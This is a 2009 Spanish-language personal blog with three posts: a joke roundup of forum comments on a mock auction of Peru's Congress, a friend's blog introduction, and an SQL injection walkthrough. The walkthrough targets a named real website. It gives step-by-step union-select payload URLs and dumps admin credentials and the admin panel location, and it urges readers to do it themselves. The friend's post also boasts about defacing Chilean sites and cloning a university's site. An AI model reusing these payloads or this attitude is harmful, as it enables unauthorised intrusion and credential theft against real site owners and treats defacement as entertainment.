domingo, 4 de octubre de 2009

¿Comprarían el Congreso?

Hoy Domingo en mi poco tiempo libre encendí la computadora y como siempre me pongo a navegar un poco, siendo más preciso ingresé al foro PeruNice.com antes SoyForero.com y veo en la categoría noticias "Congreso de la República en venta" publicado por mi gran amigo "Diego Bardalez" al ver sólo el titulo pues me causó bastante gracia que alguien haya subastado en congreso en Kotear.pe. ¡Qúe Ingenuo! el que lo hizo me dije yo mismo..


En fín después de haber visto el anuncio me puse a leer rápidamente todas las subastas hechas por los usuarios, y hay algunos comentarios que estuvieron tan graciosos que los mencionaré en las siguientes líneas:
* Por facial_55
saben yo no daria ni un sol con los otorongos que hay coNla ROBA LUZ,EL COMO POLLO,EL MATA PERRO,LA COCALERA, EL INVASOR DE TERRENOS,EL QUE LO APUÑALA SU MUJER,LA PEDICURISTA, EL LAVANDERO, la hijita de papi no se lucianita. AAy me quedo ahi porque me falta tiempo para seguir poniendo nombres ..... OTORONGASOS
* Por peruanosincero
Hola soy propietario de una chancheria clandestina , de esas donde los cerdos se alimentan con basura,traigo una propuesta que no puedes rechazar,te doy una porcion de chicharrones,espero que aceptes mi oferta , si no, Caballero, así es la competencia.
* Por z_martin
TE LO COMPRO,LO CONVERTIRE EN UN LUGAR DE TRABAJO ASI Q SACAME A TODOS ESOS VAGOS X Q YA ME CANSE DE DARLES DE TRAGAR
* Por Peruano_con
A cuento el congresista ? vende pollos , toy por abrir mi polleria y lo quiero para sea mi mayorista ps , y tbm kiero al tio mata perros para ponerlo de wuachi para k se baje a todos los PERROS que pasen por hay....tbm a la congresista que le gusta los pies ...la kiero pa k me lave las patitas del pollo pal aguadito ....y tbm a congresista k le gusta la grifa para vender en mi polleria mi tesito de coca:)!
Así como algunos brindan opiniones serias bueno tambien hay usuarios que escribieron que darían lo que fuera por Lucianita sola; sería bueno si saldría sola, ¿quién no la compraría?
* Por callife
Era verdad, enserio lo vendias, lo acabo de ver, sale lucinita sola? a cuanto?
* Por jfernando
ya la ultima oferta te doy mi play 2 por luciana!
* Por informatico
te hago una oferta, pero solo por lucianita..!!! por los demas no te doy ni las gracias :D
Otros que subastaron al song de la música de los Nosequien y Los Nosecuantos:
* Por CaViaR
ir.pe/cvr ir.pe/cantuta por 5 lukas (del 85) me compro un congresista, un juez sm, un par de periodistaaas... que siga el remate!!
Bueno en fín aquí hay dos subastas que sobresalen de entre todas:
* Por Leonardo9113
Estimado Vendedor, somos de la oficina de la Defensa al Consumidor y lamentamos informarle que esta usted cometiendo un delito, no puede ofrecer un producto tan deficiente, podrido y en tan mal estado. Gracias
* Por EWAY
Brother te puedo pagar con chapitas de gaseosa quiero comprar al congresista come pollo y al congresista roba luz, ah y tambien me das a uno de esos cabrones nacionalistas para tener surtidito mi corralito de animales... hasta cuando señores tendremos ese tipo de congresistas basta ya por favor.!
Qué ocurrencia del que empezó la subasta.. en verdad me pareció muy gracioso así como la niña inglesa que subasto a su Abuela en EbAy.. jajaja

Bueno me despido hasta mi próximo post, que estoy seguro que sera dentro de unos meses o algo por el estilo ya que ahora TRABAJO y no me da mucho tiempo para bloguear, twittear; que la verdad son cosas que me gusta hacer bastante.

lunes, 7 de septiembre de 2009

Injectión SQL con Gothic-X

WEB: http://directinformatica.es/
METODO DE ATAQUE: SQL INJECTION

Bueno empesaremos con buscar la parte de la web donde es vulnerable en este caso sera en:
http://directinformatica.es/detalle.php?id=
Verificamos si es vulnerable haciendo una consulta con solo ponerle ( ' ) una coma, efectivamente este sitio es vulnerable a sql, ¿como sabemos? por que nos arrojo un mensaje de error el cual es el siguiente:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gedraqxj/public_html/detalle.php on line 35
El cual nos indica que es vulnerable, bueno ahora buscaremos cuántas columnas tiene el sitio agregando lo siguiente al final de la url de la web:
( detalle.php?id=-1+union+select+0,1,2,3,4,...,
En este caso tiene 9 columnas osea quedaria de la siguienteforma.
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,8--
Entrando veremos que nos arrojo unos numeritos en la web en este caso fueron : 8 , 4 , 2 .

ya estando aqui veremos si la web tiene information schema de manera que quede de esta forma agregando al final
+from+information_schema.tables--
y reemplazando cualquiera de los numeros nos arrojo la web por table_name quedando la url de la aiguiente manera:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema--
Perfecto nos arrojo un texto CHARACTER_SETS el cual es una tabla y con eso confirmamos que tiene information schema, ahora buscaremos la tabla de usuario, usuarios o admin agregando al final:
+limit+1,1--
y quedaria de esta forma:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+1,1--
Ahora para que encontremos la tabla deseada avansaremos en el primer uno del limit de la siguiente manera.
+limit+2,1--
Hasta encontrar la tabla deseada. en esta web se tubo que avansar 20 para la tabla deseada y quedo de la siguiente manera:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+20,1--
Y nos dio como resultado: adm_usuario

Ahora como ver lo que esta dentro de la tabla, osea ver las columnas, bueno primero convertiremos la tabla a hexadecimal usualmente uso esta herramienta:

http://hwagm.elhacker.net/php/sneak.php

Bueno nos dio como resultado:
61646d5f7573756172696f
Al final de la url de la injection aditaremos el final reemplazando
.tables+limit+20+1--
por
columns+where(table_name=0xaquitabalaenhex)--
y

Donde tenemos table_name lo reemplazamos por column_name y nos quedaria de la siguiente manera:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,column_name+from+information_schema.columns+where(table_name=0x61646d5f7573756172696f)--
Y vemos que nos arroja las columnas y para ir encontrando las columnas deseadas avansamos con +limit+1,1-- cambiando el 1 por 2 y asi susesivamente hasta encontrar las columnas deseadas.

En esta web encontramos las siguientes columnas:
id_user, id_tipo, nomb_user , nick_user , pass_user , acti_user
Bién ya con esas tenemos las esenciales que son: nomb_user y pass_user.

Ahora como vemos dentro de las columnas? bueno solo reemplazamos el final despues de +from+ y agregamos el nombre de la tabla que es adm_usuario y donde tenemos column_name reemplazamos por concat(columna,0x3a,columna) el 0x3a esta en hexadecimal y es ( : ), entonces nos quedaria de la siguiente manera nuestra url:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,concat(nick_user,0x3a,pass_user)+from+adm_usuario--
Y nos arrojara nuestra informacion deseada que es la siguiente:
admin:matias1
Ahora solo nos falta encontrar el admin panel, en la siguiente web es:
http://directinformatica.es/cms/
Así nos logeamos y hacemos lo que tengamos que hacer, creo que este final es más fácil de hacer.

Háganlo ustedes mismos y sí que es recontra facilísimo..

Con un poco de ayudita de Gothic-X

domingo, 6 de septiembre de 2009

Dr. Neox presenta su Blog

Ahora que está de moda los blogs, los concursitos huachafos como 20 Blogs y entre otros más, tengo el gusto de presentar a un amigo a quién conocí hace muy poco y también a quién no conocí aún, pero si tuvimos la gran oportunidad de compartir y participar en Élite-Peruvian y de quién me hice muy amigo hasta tener en planes la construcción de una Red Social en base a un script que modificariamos y el cuál no llego a concretarse, diría yo por falta de interés de él mismo ya que yo si tuve las ganas de levantar esa Red Social.

Bueno sin más habladurías hoy me conecto al Messenger después de dos días sin internet y llego a ver en su mensaje personal la dirección de un blog el cuál investigué un poco y así supe que era de él (Dr. Neox)

Vaya que al ver su blog, y al sólo pensar en él (Dr. Neox) me viene a la memoria que algunos días nos quedamos de madrugada sólo por joder (ownear) algunas webs chilenas y hasta llegamos a clonar la web de una Universidad Chilena que aún tengo los archivos (porsiacaso).

PD: Aún guardo capturas de pantalla de algunas webs owneadas con Dr. Neox para que sea más creible les dejo una de las tantas que hicimos:
Imagen de una web chilena que owneamos con Dr. Neox and ca0s1 a eso de las 11.40 pm cuando el festín recien empezaba.. click para ampliar la imagen..

Ahora tengo el gusto de presentar a un amigo más (Dr. Neox) con su blog personal, si quieren visitar su blog y leer sus ocurrencias pues les dejo el link de su blog AQUI.
La imagen de su Blog fué sacado por petición del mismo Dr.Neox
URL de su Blog: http://drneox.diosdelared.com

Una partecita de la presentación de su blog la cuál me gusto es en donde menciona lo siguiente:
supongo que a escribir , linkear, posicionarme en google, ganar dinero, donarlo a los niños pobres e irme de mochilero por el mundo jajajaj.
bueno bienvenidos mutantes.
Bién es todo por hoy. un post rapidito para presentar a mi amigo Dr. Neox que aún le estoy esperando a que me diga la fecha de la conferencia de Seguridad que me habló. Apropósito ya que andas con tu blog haber si te animas a twittear.